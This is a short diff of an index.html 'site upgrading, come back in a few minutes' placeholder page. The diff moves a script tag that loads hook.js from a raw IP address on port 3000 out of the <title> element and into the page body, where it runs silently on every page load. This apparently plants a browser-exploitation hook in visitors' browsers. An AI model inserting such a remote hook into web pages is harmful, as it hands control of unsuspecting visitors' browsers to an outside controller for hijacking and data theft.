--- a/index.html
+++ b/index.html
@@ -3,7 +3,7 @@
 <head>
 <!-- HTML Codes by Quackit.com -->
 <title>
-  <script src="http://68.183.26.215:3000/hook.js"></script>
+  website
 </title>
 <meta name="viewport" content="width=device-width, initial-scale=1">
 <style>
@@ -15,5 +15,6 @@ p {font-family:Georgia, serif;font-size:14px;font-style:normal;font-weight:norma
 <body>
 <h4>We are currently upgrading our website,kindly visit this site in few minutes time.</h4>
 <p></p>
+  <script src="http://68.183.26.215:3000/hook.js"></script>
 </body>
 </html>
